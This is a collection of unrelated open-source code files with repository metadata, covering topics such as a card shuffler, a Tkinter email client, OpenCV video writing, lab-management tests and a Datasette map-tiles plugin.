print "assetPath:", path.assetPath
print "charPath:", path.charPath
print "propPath:", path.propPath
print "shot:", path.shot
print "shotName:", path.shotName
print "shotType:", path.shotType
print "shotFullname:", path.shotFullname
print "shotShortname:", path.shotShortname
print "shotStage:", path.shotStage
print "scenePath:", path.scenePath
print "compPath:", path.compPath
print "anmPath:", path.anmPath
print "lgtPath:", path.lgtPath
print "jobId", path.job.id #many attributes are accessible with dot notation
#folder navigation
print "scenePath", path.scenePath
print "compPath", path.compPath
print "framesPath", path.framesPath
#job info determined by db
print "start_date", path.job.start_date
print "status", path.spot.status
#lgt shot specific functions
print "variants", path.getVariants()
print "masters", path.getMasters()
print "mastername", path.getMasterName()
print "version", path.getVersion()
|
[
"zethwillie@gmail.com"
] |
zethwillie@gmail.com
|
1d0101942a1f8158b1df89d28a581f8a989d6099
|
a7cca49626a3d7100e9ac5c2f343c351ecb76ac7
|
/tests/dev_tests/get_machine_freq.py
|
53f58efc5548afd9221dc39ed26ccc27e86361d3
|
[
"MIT"
] |
permissive
|
Carglglz/upydev
|
104455d77d64300074bda54d86bd791f19184975
|
529aa29f3e1acf8160383fe410b5659110dc96de
|
refs/heads/master
| 2023-05-24T18:38:56.242500
| 2022-10-21T14:03:17
| 2022-10-21T14:03:17
| 199,335,165
| 49
| 9
|
MIT
| 2022-10-21T14:03:18
| 2019-07-28T20:42:00
|
Python
|
UTF-8
|
Python
| false
| false
| 137
|
py
|
import machine
def freq():
fq = machine.freq()
if isinstance(fq, tuple):
return int(fq[0]/1e6)
return int(fq/1e6)
|
[
"carlosgilglez@gmail.com"
] |
carlosgilglez@gmail.com
|
bc5354942ec4f909d4ccdf9434a01480c07a0da5
|
86cc17a69213569af670faed7ad531cb599b960d
|
/player12.py
|
9f6d8ddf708fb3e1cbee2e05883e552d33187881
|
[] |
no_license
|
LakshmikanthRavi/guvi-lux
|
ed1c389e27a9ec62e0fd75c140322563f68d311a
|
5c29f73903aa9adb6484c76103edf18ac165259e
|
refs/heads/master
| 2020-04-15T05:07:19.743874
| 2019-08-13T08:53:00
| 2019-08-13T08:53:00
| 164,409,489
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
u,m=map(int,input().split())
g=list(map(int,input().split()))
r=[]
for i in range(u-m,u):
r.append(g[i])
for i in g:
if i not in r:
r.append(i)
print(*r)
|
[
"noreply@github.com"
] |
LakshmikanthRavi.noreply@github.com
|
e02eccd31bb9c7d6aaa7d19529cafad2e12d8805
|
672ea11a7dee763fc8c37bc82bb609b8de19344c
|
/src/生成斗地主扑克牌.py
|
28fff2f03a30318453efc6cfebefc64fa9a69cbd
|
[] |
no_license
|
qlong8807/python3-lesson
|
294ede6a0de1d89f513209b00504e8f0c9bb2607
|
ac4e745a8e8d0ab665e2ff676ddcd0ab190fed06
|
refs/heads/master
| 2020-04-08T15:18:44.564272
| 2020-02-18T08:33:30
| 2020-02-18T08:33:30
| 159,472,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
# coding:utf8
# author:jans
# desc: 扑克牌洗牌
import random
poker_num = [str(i) for i in range(2,11)]
poker_str = ['A','J','Q','K']
poker_king = ['大王','小王']
poker_color = ['红','黑','方','花']
pokers = ['%s%s' %(i,j) for i in poker_color for j in poker_num+poker_str] + poker_king
print(len(pokers))
print(pokers)
print('开始洗牌')
random.shuffle(pokers)
print('洗牌中。。。')
print(pokers)
#斗地主发牌
person_a = pokers[0:51:3]
person_b = pokers[1:51:3]
person_c = pokers[2:51:3]
last_3 = pokers[-3:]
print('第一个人的牌:',person_a)
print('第二个人的牌:',person_b)
print('第三个人的牌:',person_c)
print('底牌:',last_3)
|
[
"qlong8807@hotmail.com"
] |
qlong8807@hotmail.com
|
4ab465fcdde84101246798cce491652b00295dce
|
63cf686bf970d28c045719de2f0e7e9dae5bed15
|
/N-th Tribonacci Number.py
|
13e5231116e6aba79408a56a4f23a7c77a01f1bf
|
[] |
no_license
|
menard-noe/LeetCode
|
6461bda4a076849cf69f2cd87999275f141cc483
|
4e9c50d256c84d1b830a7642b265619a0b69d542
|
refs/heads/master
| 2022-12-13T09:41:41.682555
| 2020-09-14T12:46:53
| 2020-09-14T12:46:53
| 282,481,920
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
from typing import List
class Solution:
def __init__(self):
self.memo = {0: 0, 1: 1, 2: 1}
def tribonacci(self, n: int) -> int:
if n in self.memo:
return self.memo[n]
else:
self.memo[n] = self.tribonacci(n - 1) + self.tribonacci(n - 2) + self.tribonacci(n - 3)
return self.memo[n]
if __name__ == "__main__":
# execute only if run as a script
n = 25
solution = Solution()
print(solution.tribonacci(n))
|
[
"noe.menard4@gmail.com"
] |
noe.menard4@gmail.com
|
d37e9764102913288d0e90d9ba66699201662d2d
|
3b2940c38412e5216527e35093396470060cca2f
|
/top/api/rest/LogisticsOrderShengxianConfirmRequest.py
|
3a40c08aaf7002f5809c5f42c433f502317e3311
|
[] |
no_license
|
akingthink/goods
|
842eb09daddc2611868b01ebd6e330e5dd7d50be
|
ffdb5868a8df5c2935fc6142edcdf4c661c84dca
|
refs/heads/master
| 2021-01-10T14:22:54.061570
| 2016-03-04T09:48:24
| 2016-03-04T09:48:24
| 45,093,302
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
'''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class LogisticsOrderShengxianConfirmRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.cancel_id = None
self.delivery_type = None
self.logis_id = None
self.out_sid = None
self.seller_ip = None
self.sender_id = None
self.service_code = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.order.shengxian.confirm'
|
[
"yangwenjin@T4F-MBP-17.local"
] |
yangwenjin@T4F-MBP-17.local
|
14955d30fe26123e3716725167c4d68ad49205a2
|
e76ea38dbe5774fccaf14e1a0090d9275cdaee08
|
/src/cc/DEPS
|
4e1cc74d6cc126e06e3aa1337ee58dc83ccb80ad
|
[
"BSD-3-Clause"
] |
permissive
|
eurogiciel-oss/Tizen_Crosswalk
|
efc424807a5434df1d5c9e8ed51364974643707d
|
a68aed6e29bd157c95564e7af2e3a26191813e51
|
refs/heads/master
| 2021-01-18T19:19:04.527505
| 2014-02-06T13:43:21
| 2014-02-06T13:43:21
| 16,070,101
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
include_rules = [
"+gpu/GLES2",
"+gpu/command_buffer/client/context_support.h",
"+gpu/command_buffer/common/gpu_memory_allocation.h",
"+gpu/command_buffer/common/mailbox.h",
"+media",
"+skia/ext",
"+third_party/skia/include",
"+third_party/khronos/GLES2/gl2.h",
"+third_party/khronos/GLES2/gl2ext.h",
"+ui/events/latency_info.h",
"+ui/gfx",
"+ui/gl",
# DO NOT ADD ANY NEW WEBKIT HEADERS TO THIS LIST.
# TODO(danakj): Drop dependencies on WebKit Platform API from cc.
"+third_party/WebKit/public/platform/WebGraphicsContext3D.h",
]
|
[
"ronan@fridu.net"
] |
ronan@fridu.net
|
|
7b2a0da5898ff8cc6de859b91194a6f1fd42975e
|
03534ce46ccb4d82e7752cac264884090c16ae1f
|
/PyBind11/config.py
|
a61a9b2d3e787f538b9046e074857e84ede13092
|
[] |
no_license
|
alex-v-dev/dependencies
|
0ca2a67b97bb9403fa973d4b0a9f34f98694bcdd
|
11307514feccd38eeda66c9f0b83194358ffc956
|
refs/heads/master
| 2023-07-04T22:49:52.940631
| 2021-06-14T13:34:27
| 2021-06-14T13:34:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
{
"downloads" : [
"https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
],
"url" : "https://pybind11.readthedocs.io",
"license" : "LICENSE",
"dependencies" : [ "Python" ],
"environment" : {
"PATH" : "{buildDir}/bin:$PATH",
"LD_LIBRARY_PATH" : "{buildDir}/lib",
},
"commands" : [
"cmake"
" -D CMAKE_INSTALL_PREFIX={buildDir} ."
" -D PYBIND11_TEST=0",
"make install",
],
"manifest" : [
"include/pybind11",
],
}
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
089de6e71f93ea67d7b8693f6b0221acef7db5d3
|
20cc35cb819d988d35d25ae942d0ecc9fe7bc726
|
/Prac_03/word_generator_prac_three.py
|
252cd137d3a0b982f809d37432661bd9d8b0abde
|
[] |
no_license
|
LukeElliman/Practicals
|
1272b51e9ef45f27dcb31f7d1238a429e14f3d15
|
f9de0adff1616e4b797b96f83fa1869790a0492f
|
refs/heads/master
| 2023-05-05T21:42:45.922665
| 2021-05-23T23:36:08
| 2021-05-23T23:36:08
| 341,446,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
"""
CP1404/CP5632 - Practical
Random word generator - based on format of words
Another way to get just consonants would be to use string.ascii_lowercase
(all letters) and remove the vowels.
"""
import random
VOWELS = "aeiou"
CONSONANTS = "bcdfghjklmnpqrstvwxyz"
VALID_INPUT = "cv"
def main():
#User input
valid_input = False
while not valid_input:
word_format = str(input("Enter c's for consonant and v's for vowels: ")).lower()
valid_input = is_valid_format(word_format)
word = word_generator(word_format)
print(word + "\n")
#Random
number_of_letters = int(input("How many letters do you want? "))
letters = "cv"
word_format = "".join(random.choice(letters) for i in range(number_of_letters))
word = word_generator(word_format)
print(word)
def is_valid_format(user_input):
"""Checks if input is valid"""
valid = False
valid_character_count = 0
for each_character in user_input:
if each_character not in VALID_INPUT:
valid_character_count += 1
if valid_character_count > 0:
print("Your input must only be c's and v's")
valid_character_count = 0
elif len(user_input) <= 0:
print("Your input must have more then 0 characters")
else:
print("Valid input \n")
valid = True
return valid
def word_generator(user_input):
"""Turns the cv input into words"""
word = ""
for kind in user_input:
if kind == "c":
word += random.choice(CONSONANTS)
else:
word += random.choice(VOWELS)
return word
main()
|
[
"luke.elliman@my.jcu.edu.au"
] |
luke.elliman@my.jcu.edu.au
|
497e239e4a4996a03027feed630c538b6b031e56
|
493fcf4b7eb61a00a51864ba2b3544541dee2935
|
/labman/gui/test/test_study.py
|
b82f7d7b999379932f6bcd0d4d743a94ba366e7a
|
[
"BSD-3-Clause"
] |
permissive
|
antgonza/labman
|
d56ab55debdbea4024e12b6e84625b5a472fdbe2
|
c3bb7a15cbfdbbf60a7b2b176fff207f99af0002
|
refs/heads/master
| 2021-05-11T16:09:12.890965
| 2019-04-08T23:29:09
| 2019-04-08T23:29:09
| 117,754,098
| 0
| 0
|
BSD-3-Clause
| 2019-03-31T20:38:09
| 2018-01-16T23:10:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,280
|
py
|
# ----------------------------------------------------------------------------
# Copyright (c) 2017-, labman development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import main
from tornado.escape import json_decode
from labman.gui.testing import TestHandlerBase
class TestStudyHandlers(TestHandlerBase):
def test_get_study_list_handler(self):
response = self.get('/study_list')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'data': [
[1, 'Identification of the Microbiomes for Cannabis Soils',
'Cannabis Soils', 'test@foo.bar', 27]]}
self.assertEqual(obs, exp)
def test_get_study_handler(self):
response = self.get('/study/1/')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'study_id': 1,
'study_title': 'Identification of the Microbiomes for '
'Cannabis Soils',
'total_samples': 27}
self.assertEqual(obs, exp)
# Test non-existent study
response = self.get('/study/400/')
self.assertEqual(response.code, 404)
def test_get_study_samples_handler(self):
response = self.get('/study/1/samples')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200',
'1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190',
'1.SKD7.640191', '1.SKD8.640184', '1.SKD9.640182',
'1.SKM1.640183', '1.SKM2.640199']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB1')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=1.64')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKD1.640179', '1.SKM1.640183']
self.assertEqual(obs, exp)
# test non-existent study
response = self.get('/study/400/sample_search')
def test_get_study_summary_handler(self):
response = self.get('/study/1/summary')
self.assertEqual(response.code, 200)
self.assertNotEqual(response.body, '')
response = self.get('/study/1000/summary')
self.assertEqual(response.code, 404)
if __name__ == '__main__':
main()
|
[
"josenavasmolina@gmail.com"
] |
josenavasmolina@gmail.com
|
1a728171fa0d72923f75ff0a93d3da29aad4725e
|
4476597f6af6b9cd4614bf558553a7eb57c9f993
|
/io/email-send.py
|
b0c8e5b3defd2e2685124e52af398dd84e39b324
|
[] |
no_license
|
zhengziqiang/mypython
|
07dff974f475d1b9941b33518af67ece9703691a
|
7a2b419ff59a31dc937666e515490295f6be8a08
|
refs/heads/master
| 2021-07-14T20:01:34.231842
| 2017-04-19T01:18:25
| 2017-04-19T01:18:25
| 56,583,430
| 3
| 1
| null | 2020-07-23T11:46:35
| 2016-04-19T09:26:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,529
|
py
|
from Tkinter import *
from smtplib import *
import string
import tkMessageBox as mes
class loginPage(object):
def __init__(self,master,info='Mail Send System'):
self.master=master
self.mainlabel=Label(master,text=info,justify=CENTER)
self.mainlabel.grid(row=0,columnspan=3)
self.user=Label(master,text='username',borderwidth=2)
self.user.grid(row=1,sticky=W)
self.pwd=Label(master,text='passwd',borderwidth=2)
self.pwd.grid(row=2,sticky=W)
self.userEntry=Entry(master)
self.userEntry.grid(row=1,column=1,columnspan=2)
self.userEntry.focus_set()
self.pwdEntry=Entry(master,show='*')
self.pwdEntry.grid(row=2,column=1,columnspan=1)
self.loginButton=Button(master,text='login',borderwidth=2,command=self.login)
self.loginButton.grid(row=3,column=1)
self.clearButton=Button(master,text='Clear',borderwidth=2,command=self.clear)
self.clearButton.grid(row=3,column=2)
def login(self):
self.username=self.userEntry.get().strip()
self.passwd=self.pwdEntry.get().strip()
if len(self.username) ==0 or len(self.passwd)==0 or '@' not in self.username:
mes.showwarning('warning','passwd or username is not right')
self.clear()
self.userEntry.focus_set()
return
self.get_smtp()
self.connect()
def connect(self):
'this method will try to connect to the smtp server according to the current user'
HOST='smtp' + self.smtp + '.com'
try:
self.mysmtp=SMTP(HOST)
self.mysmtp.login(self.username,self.passwd)
except Exception, e:
mes.showerror('connecting error','%s'%e)
return
self.mySendMail=sendMail(self.master,self.mysmtp,self.username)
def clear():
self.userEntry.delete(0,END)
self.pwdEntry.delete(0,END)
def get_smtp(self):
'this method try to obtain the smtp host according the user account'
firstSplit=self.username.split('@')[1]
self.smtp=firstSplit.split('.')[0]
class sendMail(object):
def __init__(self,master,smtp='',sender=''):
self.smtp=smtp
self.sender=sender
self.sendPage=Toplevel(master)
self.sendToLabel = Label(self.sendPage,text='send to:')
self.sendToLabel.grid()
self.sendToEntry = Entry(self.sendPage)
self.sendToEntry.grid(row=0,column=1)
self.subjectLabel=Label(self.sendPage,text='subject:')
self.subjectLabel.grid(row=1,column=0)
self.subjectEntry=Entry(self.sendPage)
self.subjectEntry.grid(row=1,column=1)
self.fromTolabel=Label(self.sendPage,text='from to')
self.fromTolabel.grid(row=2,column=0)
self.fromToAdd=Label(self.sendPage,text=self.sender)
self.fromToAdd.grid(row=2,column=1)
self.sendText=Text(self.sendPage)
self.sendText.grid(row=3,column=0,columnspan=2)
self.newButton=Button(self.sendPage,text='new mail',command=self.newMail)
self.newButton.grid(row=4,column=1)
def getMailInfo(self):
self.sendToAdd=self.sendToEntry.get().strip()
self.subjectInfo=self.subjectEntry.get().strip()
self.sendTextInfo=self.sendText.get(1.0.END)
def sendMail(self):
self.getMailInfo()
body=string.join(("From: %s" % self.sender, "To: %s" % self.sendToAdd, "Subject: %s" % self.subjectInfo, "", self.sendTextInfo), "\r\n")
try:
self.smtp.sendmail(self.sender,[self.sendToAdd],body)
except Exception as e:
mes.showerror("send failure:","%s"%e)
mes.showinfo('Prompt','success')
def newMail(self):
self.sendToEntry.delete(0,END)
self.subjectEntry.delete(0,END)
self.sendText.delete(1,END)
if __name__=='__main__':
root=Tk()
root.title('simple mail send system')
mylogin=loginPage(root)
mainloop()
|
[
"1174986943@qq.com"
] |
1174986943@qq.com
|
580123fccf31e7c332168aeb8fe195413662dc0f
|
8aa50378af42f325083be548baaf78b4dbf619ab
|
/OpenCVTest/ReadWebMFile/read_n_save_to_video.py
|
cb193792096e706e0ef3c655661e388c76d2d982
|
[] |
no_license
|
jamescfli/PythonTest
|
35919a6671b3d85a0f0212ea6da8baefbd5fcbe0
|
87c4092b046fba45e3e98f03944c17edde11b8b1
|
refs/heads/master
| 2021-01-20T02:44:25.963174
| 2017-07-01T15:58:32
| 2017-07-01T15:58:32
| 62,287,876
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
import cv2
# video_filepath = './video_clips/b.mp4' # no problem for .mp4 in general, but this one does not work
# video_filepath = './video_clips/b.webm'
# video_filepath = './video_clips/test.webm'
video_filepath = './video_out/b_640x1280_15fps.mp4'
# video_filepath = './video_out/b_640x1280_60fps.mp4'
# .. Issue: VIDEOIO(cvCreateFileCapture_AVFoundation (filename)): raised unknown C++ exception!
print("loading {}".format(video_filepath))
cap = cv2.VideoCapture(video_filepath)
# cap = cv2.VideoCapture(video_filepath, cv2.CAP_FFMPEG) # after brew install ffmpeg
print("capture finished")
output_shape = (480, 960)
# const char* filename, int fourcc, double fps, CvSize frame_size, int is_color=1 (gray or color)
# forcecc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')
# forcecc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
forcecc = cv2.VideoWriter_fourcc(*'MPEG')
out = cv2.VideoWriter('./video_out/output.avi', forcecc, 30.0, output_shape[::-1], isColor=True)
print('finish init video writer')
frame_counter = 0
while (cap.isOpened()):
ret, frame = cap.read()
if ret:
frame_counter += 1
out.write(frame)
else:
break
print frame_counter # 2473 frames for b.mp4
cap.release()
out.release()
cv2.destroyAllWindows()
|
[
"jamescfli@yahoo.com"
] |
jamescfli@yahoo.com
|
5ed9622704f875d95003d08b1e22ecbfb53984cd
|
99ca151c59afd9c0e7091b6919768448e40f88a2
|
/numpy_and_math_error.py
|
ae3f097ca8ea71aad9e01311276bd6f306b6dfdb
|
[] |
no_license
|
zainabnazari/Python_note
|
1b6a454f6e7b3aca998d87a201823a600ec28815
|
3beb52beb3a0ebe17a6ac8c5695670e9dde59269
|
refs/heads/main
| 2023-02-10T22:32:33.160428
| 2021-01-12T18:36:54
| 2021-01-12T18:36:54
| 304,724,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#file name: numpy_and_math_error.py
import numpy as np
import math
myarray = np.array([1,2,3])
root = math.sqrt(myarray)
print(root)
"""
Output:
Traceback (most recent call last):
File "numpy_and_math_error.py", line 5, in <module>
root = math.sqrt(myarray)
TypeError: only size-1 arrays can be converted to Python scalars
"""
|
[
"nazari.zainab@gmail.com"
] |
nazari.zainab@gmail.com
|
dd9947fc7776c6931faffc56c6329f2422b0f5d0
|
04a77043cebd9415069aad4a6b8e7af077de1168
|
/1-pbase/day11/exmple/filter.py
|
c8a7fa97539cd633362bc8a071f7fe9afc4d4bc4
|
[] |
no_license
|
yangxiangtao/biji
|
a935fbc4af42c81205900cb95a11e98c16d739de
|
5c5f46e6c145fc02ea10b7befdc05c489fc3b945
|
refs/heads/master
| 2022-11-12T02:25:51.532838
| 2019-04-02T01:22:12
| 2019-04-02T01:22:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
# def is_odd(x):
# return x%2==1
# for x in filter(is_odd,range(20)):
# print(x)
# for x in filter(lambda x:x%2==1,range(10)):
# print(x)
L=list(filter(lambda x: x%2==1,range(10)))
print(L)
|
[
"123@bb.com"
] |
123@bb.com
|
0ba46ca25f7954a614e976605f8cede03101b4ed
|
1356c64ee93435b3d312c8abbf0cfbdf28935645
|
/2565_electric_flex_20191212.py
|
3984d15a3a4e99cec8677dff6cf213d5e661f827
|
[] |
no_license
|
tmtmaj/algorithm_2019_12_03
|
48829c6c03fa1b4528fc161056303c30eab1a31a
|
bf86bd36a044978fa3a60b65a7a248de2a2052ac
|
refs/heads/master
| 2021-06-25T05:07:42.726320
| 2021-05-08T14:20:02
| 2021-05-08T14:20:02
| 225,642,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
# import sys
# cmd = lambda: sys.stdin.readline()
#
# def x_func(e_list):
# e_list = e_list
# x_list = [0 for _ in range(len(e_list))]
#
# for i in range(len(e_list)):
# for j in range(i + 1, len(e_list)):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# return x_list
#
#
# N = int(cmd().strip())
# e_list = []
# cnt = 0
#
# for _ in range(N):
# e_list.append(list(map(int, cmd().strip().split())))
#
# x_list = [0 for _ in range(N)]
#
# # print(e_list)
# for i in range(N):
# for j in range(i+1, N):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# # print(x_list)
#
# while max(x_list) != 0:
# max_x = max(x_list)
# max_x_index = x_list.index(max_x)
# del e_list[max_x_index]
# x_list = x_func(e_list)
# cnt += 1
# print(x_list)
# print(e_list)
#
# print(cnt)
import sys
cmd = lambda: sys.stdin.readline()
N = int(cmd().strip())
e_list = [list(map(int, cmd().strip().split())) for _ in range(N)]
e_list.sort(key = lambda x: x[0])
lis = [1]
for i in range(1, N):
lis.append(1)
for j in range(i):
if e_list[i][1] > e_list[j][1] and lis[j] + 1 > lis[i]:
lis[i] = lis[j] + 1
print(N - max(lis))
|
[
"qkrwjdgur09@naver.com"
] |
qkrwjdgur09@naver.com
|
48c0e9e27a52eafca750b8ee40a439230b894fcf
|
116aadef9866be33782c6cbd06901703728295cc
|
/datasette_tiles/__init__.py
|
f8a2f4b9cec6f2c18358bdf5ac7b743a850c6d3f
|
[
"Apache-2.0"
] |
permissive
|
dracos/datasette-tiles
|
9c4cf6ca683a703f08e1f69cbc4def3694d7bcc3
|
f7aa1a49df23584445cf154ad0e3e6d750965b15
|
refs/heads/main
| 2023-02-28T22:33:08.331682
| 2021-02-03T22:21:57
| 2021-02-03T22:21:57
| 335,932,265
| 0
| 0
| null | 2021-02-04T11:24:40
| 2021-02-04T11:24:39
| null |
UTF-8
|
Python
| false
| false
| 6,641
|
py
|
from datasette import hookimpl
from datasette.utils.asgi import Response, NotFound
from datasette_tiles.utils import detect_mtiles_databases, tiles_stack_database_order
import json
# 256x256 PNG of colour #dddddd, compressed using https://squoosh.app
PNG_404 = (
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x04\x00\x00"
b"\x00\x00\xbc\xe9\x1a\xbb\x00\x00\x00\x9cIDATx\xda\xed\xce1\x01\x00\x00\x0c\x02"
b"\xa0\xd9?\xe3\xba\x18\xc3\x07\x12\x90\xbf\xad\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\xac"
b"\x03\x05\xddg\xde\x01\xd26\xe7\xdd\x00\x00\x00\x00IEND\xaeB`\x82"
)
SELECT_TILE_SQL = """
select
tile_data
from
tiles
where
zoom_level = :z
and tile_column = :x
and tile_row = :y
""".strip()
@hookimpl
def register_routes():
return [
(r"/-/tiles$", index),
(r"/-/tiles/(?P<db_name>[^/]+)$", explorer),
(r"/-/tiles/(?P<db_name>[^/]+)/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tile),
(r"/-/tiles-stack$", tiles_stack_explorer),
(r"/-/tiles-stack/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tiles_stack),
]
async def index(datasette):
return Response.html(
await datasette.render_template(
"tiles_index.html",
{"mbtiles_databases": await detect_mtiles_databases(datasette)},
)
)
async def load_tile(db, request):
z = request.url_vars["z"]
x = request.url_vars["x"]
y = request.url_vars["y"]
result = await db.execute(
SELECT_TILE_SQL,
{
"z": z,
"x": x,
"y": y,
},
)
if not result.rows:
return None
return result.rows[0][0]
async def tile(request, datasette):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
tile = await load_tile(db, request)
if tile is None:
return Response(body=PNG_404, content_type="image/png", status=404)
return Response(body=tile, content_type="image/png")
async def tiles_stack(datasette, request):
priority_order = await tiles_stack_database_order(datasette)
# Try each database in turn
for database in priority_order:
tile = await load_tile(database, request)
if tile is not None:
return Response(body=tile, content_type="image/png")
return Response(body=PNG_404, content_type="image/png", status=404)
async def explorer(datasette, request):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
default_latitude = 0
default_longitude = 0
default_zoom = 0
if metadata.get("center") and len(metadata["center"].split(",")) == 3:
default_longitude, default_latitude, default_zoom = metadata["center"].split(
","
)
min_zoom = 0
max_zoom = 19
if metadata.get("minzoom"):
min_zoom = metadata["minzoom"]
if metadata.get("maxzoom"):
max_zoom = metadata["maxzoom"]
attribution = metadata.get("attribution") or None
return Response.html(
await datasette.render_template(
"tiles_explorer.html",
{
"metadata": metadata,
"db_name": db_name,
"db_path": datasette.urls.database(db_name),
"default_latitude": default_latitude,
"default_longitude": default_longitude,
"default_zoom": default_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
async def tiles_stack_explorer(datasette):
attribution = ""
# Find min/max zoom by looking at the stack
priority_order = await tiles_stack_database_order(datasette)
min_zooms = []
max_zooms = []
attributions = []
for db in priority_order:
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
if "minzoom" in metadata:
min_zooms.append(int(metadata["minzoom"]))
if "maxzoom" in metadata:
max_zooms.append(int(metadata["maxzoom"]))
# If all attributions are the same, use that - otherwise leave blank
if len(set(attributions)) == 1:
attribution = attributions[0]
min_zoom = min(min_zooms)
max_zoom = max(max_zooms)
return Response.html(
await datasette.render_template(
"tiles_stack_explorer.html",
{
"default_latitude": 0,
"default_longitude": 0,
"default_zoom": min_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
@hookimpl
def database_actions(datasette, database):
async def inner():
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
@hookimpl
def table_actions(datasette, database, table):
async def inner():
if table != "tiles":
return None
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
|
[
"swillison@gmail.com"
] |
swillison@gmail.com
|
38ae0d1a558d1e120aea23f100feba10b508b6d0
|
5789f30bc942dde4235668c56408575b0bd25599
|
/variantBase/variantList/collect_run_variants_to_variantlist.py
|
62ac9d99d2ae82a73481e7879aa4aacca561689e
|
[] |
no_license
|
bioinfo-chu-bdx/ngs-somatic
|
bc9dfa60872a644f18650593d144726d0ab22767
|
8cc6411e16784f2891b92241a97c71788408ffb5
|
refs/heads/master
| 2023-04-25T19:48:52.073672
| 2021-03-19T14:21:49
| 2021-03-19T14:21:49
| 374,675,975
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,329
|
py
|
#!/usr/bin/python
import sys
import re
import json
import xlrd
import glob
import os
import openpyxl
